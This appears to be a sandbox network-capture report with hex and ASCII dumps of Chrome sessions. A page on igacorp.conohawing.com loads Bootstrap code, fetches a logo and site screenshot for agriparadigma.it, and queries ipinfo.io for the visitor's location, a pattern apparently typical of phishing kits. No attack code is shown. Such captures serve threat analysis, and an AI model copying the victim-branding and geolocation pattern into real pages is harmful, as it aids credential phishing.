                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 5f 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27
                                                                                                                                          Data Ascii: _._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]'
                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49
                                                                                                                                          Data Ascii: t){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryI
                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74
                                                                                                                                          Data Ascii: his._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibilit
                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52
                                                                                                                                          Data Ascii: =function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER
                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c
                                                                                                                                          Data Ascii: ement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,
                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66
                                                                                                                                          Data Ascii: t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.44976513.227.8.724432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:18 UTC575OUTGET /agriparadigma.it HTTP/1.1
                                                                                                                                          Host: logo.clearbit.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Accept: */*
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:19 UTC548INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: image/png
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          Cache-Control: public, max-age=2592000
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:18 GMT
                                                                                                                                          x-envoy-response-flags: -
                                                                                                                                          Server: Clearbit
                                                                                                                                          strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                          Via: 1.1 7fba94d7c8825d098a53404b1c675e1a.cloudfront.net (CloudFront)
                                                                                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                          X-Amz-Cf-Id: 2O64DkY899pWwLkCwaJvqBauwhoFFlHUojJbqWqgZI3VcnLwfZOfDw==
                                                                                                                                          2024-11-28 10:32:19 UTC12655INData Raw: 33 31 36 37 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 31 2e 49 44 41 54 78 9c ec 7d 09 9c 5d 45 95 f7 39 55 75 ef 7d 4b ef 5b 3a 49 67 df 49 42 02 49 08 61 0b fb ae 2c f2 81 2c 33 2a a8 33 a8 a3 8e e2 82 33 a8 1f 28 e2 32 83 0a 0a 7e 3a 80 20 08 0e ab 20 21 24 04 08 64 27 04 c8 be 76 96 ee f4 be 6f ef dd 5b 75 ce f7 bb 75 5f 37 31 a0 4c d3 af 3b f1 37 1e f2 a3 5f bf 7e ef de ba 75 aa ce fa 3f a7 14 33 c3 df e9 c8 91 38 d2 03 f8 df 4e 7f 67 c0 11 a6 bf 33 e0 08 d3 df 19 70 84 49 1d e9 01 bc 87 b8 f7 ff 82 81 19 10 19 30 00 90 1c fe b3 ef db 0f 50 e6 05 13 68 20 40 c1 64 1c 14 08 e1 7f 40 1c 7e 52 22 f7 2d 30 66 44 8c 5e 10 82 00 3c 52 cf 77 18 e1 d1 64 05 71 38 9e f0 07 23 80 01 94 99 df
                                                                                                                                          Data Ascii: 3167PNGIHDRL\1.IDATx}]E9Uu}K[:IgIBIa,,3*33(2~: !$d'vo[uu_71L;7_~u?38Ng3pI0Ph @d@~R"-0fD^<Rwdq8#
                                                                                                                                          2024-11-28 10:32:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.44977054.226.114.884432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:19 UTC617OUTGET /get/width/1200/http://agriparadigma.it HTTP/1.1
                                                                                                                                          Host: image.thum.io
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:19 UTC268INHTTP/1.1 403
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:19 GMT
                                                                                                                                          Content-Type: image/png
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                          2024-11-28 10:32:19 UTC39INData Raw: 32 31 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 06 00 00 00 eb 21 b3 cf 0d 0a
                                                                                                                                          Data Ascii: 21PNGIHDR!
                                                                                                                                          2024-11-28 10:32:19 UTC2897INData Raw: 62 34 61 0d 0a 00 00 47 a9 49 44 41 54 78 5e ec d8 5b 6e e3 c0 96 6d d1 db ff 4e d7 fd a9 04 0e 26 8a 87 c1 78 48 b4 3d 06 b0 7e 2c ee b5 43 4e a5 44 eb ff fd 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: b4aGIDATx^[nmN&xH=~,CND?
                                                                                                                                          2024-11-28 10:32:19 UTC5304INData Raw: 31 34 62 30 0d 0a ca aa f6 5d e5 a9 ce 5f 65 56 7b 9e 66 97 f6 36 df d6 f3 34 4f 75 fe 2a a3 3a 77 95 55 ed bb ca 53 9d bf 0b 00 2c e9 07 4b b3 aa 7d 57 59 d5 be bb ac 6a 5f f3 36 3d 5f 33 ab 3d cd aa f6 5d 65 55 fb 9a 59 ed 69 de a2 e7 ba cb aa f6 35 ab da d7 ac 6a 5f b3 aa 7d bb 7a 7f ba fe 3e 9a a7 3a df 9c d2 3d bb f6 b5 6f 57 6f b5 ff 2e ab da d7 ac 6a 5f b3 aa 7d cd ac f6 dc e5 94 ee 69 be a5 e7 68 66 b5 a7 99 d5 9e 66 56 7b ae b2 aa 7d 57 01 80 25 fd 60 69 56 b5 ef 2a ab da 77 97 55 ed 6b de a6 e7 6b 66 b5 a7 59 d5 be ab ac 6a 5f 33 ab 3d cd 5b f4 5c 77 59 d5 be 66 55 fb 9a 55 ed 6b 56 b5 6f 57 ef 4f d7 df 47 f3 54 e7 9b 53 ba 67 d7 be f6 ed ea ad f6 df 65 55 fb 9a 55 ed 6b 56 b5 af 99 d5 9e bb 9c d2 3d cd b7 f4 1c cd ac f6 34 b3 da d3 cc 6a cf 55
                                                                                                                                          Data Ascii: 14b0]_eV{f64Ou*:wUS,K}WYj_6=_3=]eUYi5j_}z>:=oWo.j_}ihffV{}W%`iV*wUkkfYj_3=[\wYfUUkVoWOGTSgeUUkV=4jU
                                                                                                                                          2024-11-28 10:32:19 UTC5792INData Raw: 31 36 39 38 0d 0a dc 68 66 b5 67 34 4f 75 fe 2a 6f d7 f3 36 a7 74 cf ea be f6 8c e6 a9 ce 5f e5 6d 7a be 66 b7 f6 5f e5 a9 ce 5f 65 56 7b 9e 06 00 e0 e3 7a 43 72 fa c6 a4 7b 9a 51 9d 6b 66 b5 e7 2a a3 3a 77 95 5d da 3b db df f9 ab 8c ea dc 55 9e ea fc 6c cf 3f ed b9 ca a8 ce 5d e5 db 7a 9e ab 3c d5 f9 dd 3d b3 7d ff b4 e7 2a a3 3a 37 9a 59 ed 19 cd 53 9d bf ca db f5 bc cd 29 dd b3 ba af 3d a3 79 aa f3 57 79 9b 9e af d9 ad fd 57 79 aa f3 57 99 d5 9e a7 01 00 f8 b8 de 90 9c be 31 e9 9e 66 54 e7 9a 59 ed 69 66 b5 a7 79 ab 9e b3 19 d5 b9 e6 2d 7a ae 66 56 7b 9a 6f eb 79 9a 6f eb 79 9a 59 ed 69 56 b5 ef 2a b3 da 73 97 55 ed 6b de ae e7 6d 4e e9 9e d5 7d ed b9 cb aa f6 35 6f d3 f3 35 bb b5 bf 59 d5 be 66 56 7b ee 02 00 f0 75 bd 41 39 7d a3 d2 3d cd a8 ce 35 b3
                                                                                                                                          Data Ascii: 1698hfg4Ou*o6t_mzf__eV{zCr{Qkf*:w];Ul?]z<=}*:7YS)=yWyWyW1fTYify-zfV{oyoyYiV*sUkmN}5o5YfV{uA9}=5
                                                                                                                                          2024-11-28 10:32:20 UTC4407INData Raw: 31 31 32 66 0d 0a 66 75 ae 39 ad fb be b5 f7 93 de 33 ca 2e ed 7d da df b9 e6 96 de d1 dc d2 3b 9a d3 ba af 99 d5 b9 e6 94 ee 79 bb af 3d cd 29 dd b3 6b 5f fb 76 f5 02 00 c0 92 3e 4c 9b dd da 7f 6a cf 53 bd a7 39 ad fb 9e ee ed 5c b3 5b fb 57 f7 74 be 99 d5 b9 e6 b4 ee fb d6 de 4f 7a 4f b3 5b fb 9f ee e9 5c 73 4b ef 68 6e e9 1d cd 69 dd d7 cc ea 5c 73 4a f7 bc dd d7 9e e6 94 ee d9 b5 af 7d bb 7a 01 00 60 49 1f a6 cd 6e ed 3f b5 e7 a9 de d3 9c d6 7d 4f f7 76 ae d9 ad fd ab 7b 3a df cc ea 5c 73 5a f7 7d 6b ef 27 bd a7 d9 ad fd 4f f7 74 ae b9 a5 77 34 b7 f4 8e e6 b4 ee 6b 66 75 ae 39 a5 7b de ee 6b 4f 73 4a f7 ec da d7 be 5d bd 00 00 b0 a4 0f d3 66 b7 f6 9f da f3 54 ef 69 4e e9 9e 66 56 e7 9a dd da bf ba a7 f3 cd ac ce 35 a7 74 4f 73 5b ef 69 76 6b ff ea 9e
                                                                                                                                          Data Ascii: 112ffu93.};y=)k_v>LjS9\[WtOzO[\sKhni\sJ}z`In?}Ov{:\sZ}k'Otw4kfu9{kOsJ]fTiNfV5tOs[ivk
                                                                                                                                          2024-11-28 10:32:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.44977334.117.59.814432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:19 UTC555OUTGET /json HTTP/1.1
                                                                                                                                          Host: ipinfo.io
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:20 UTC345INHTTP/1.1 200 OK
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          Content-Length: 321
                                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                                          date: Thu, 28 Nov 2024 10:32:20 GMT
                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                          via: 1.1 google
                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-28 10:32:20 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.44977413.227.8.474432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:21 UTC357OUTGET /agriparadigma.it HTTP/1.1
                                                                                                                                          Host: logo.clearbit.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:21 UTC555INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: image/png
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          Cache-Control: public, max-age=2592000
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:18 GMT
                                                                                                                                          x-envoy-response-flags: -
                                                                                                                                          Server: Clearbit
                                                                                                                                          strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                          Via: 1.1 54be26bfc4ffb919832e488b736f28fe.cloudfront.net (CloudFront)
                                                                                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                          X-Amz-Cf-Id: VR1Rb1CyMy7I7ZhlRFweWLGEbWdl8ygRH9rNaEusf3bbP7tB6C6N7Q==
                                                                                                                                          Age: 2
                                                                                                                                          2024-11-28 10:32:22 UTC12655INData Raw: 33 31 36 37 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 31 2e 49 44 41 54 78 9c ec 7d 09 9c 5d 45 95 f7 39 55 75 ef 7d 4b ef 5b 3a 49 67 df 49 42 02 49 08 61 0b fb ae 2c f2 81 2c 33 2a a8 33 a8 a3 8e e2 82 33 a8 1f 28 e2 32 83 0a 0a 7e 3a 80 20 08 0e ab 20 21 24 04 08 64 27 04 c8 be 76 96 ee f4 be 6f ef dd 5b 75 ce f7 bb 75 5f 37 31 a0 4c d3 af 3b f1 37 1e f2 a3 5f bf 7e ef de ba 75 aa ce fa 3f a7 14 33 c3 df e9 c8 91 38 d2 03 f8 df 4e 7f 67 c0 11 a6 bf 33 e0 08 d3 df 19 70 84 49 1d e9 01 bc 87 b8 f7 ff 82 81 19 10 19 30 00 90 1c fe b3 ef db 0f 50 e6 05 13 68 20 40 c1 64 1c 14 08 e1 7f 40 1c 7e 52 22 f7 2d 30 66 44 8c 5e 10 82 00 3c 52 cf 77 18 e1 d1 64 05 71 38 9e f0 07 23 80 01 94 99 df
                                                                                                                                          Data Ascii: 3167PNGIHDRL\1.IDATx}]E9Uu}K[:IgIBIa,,3*33(2~: !$d'vo[uu_71L;7_~u?38Ng3pI0Ph @d@~R"-0fD^<Rwdq8#
                                                                                                                                          2024-11-28 10:32:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.44977734.117.59.814432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:21 UTC337OUTGET /json HTTP/1.1
                                                                                                                                          Host: ipinfo.io
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:22 UTC345INHTTP/1.1 200 OK
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          Content-Length: 321
                                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                                          date: Thu, 28 Nov 2024 10:32:21 GMT
                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                          via: 1.1 google
                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
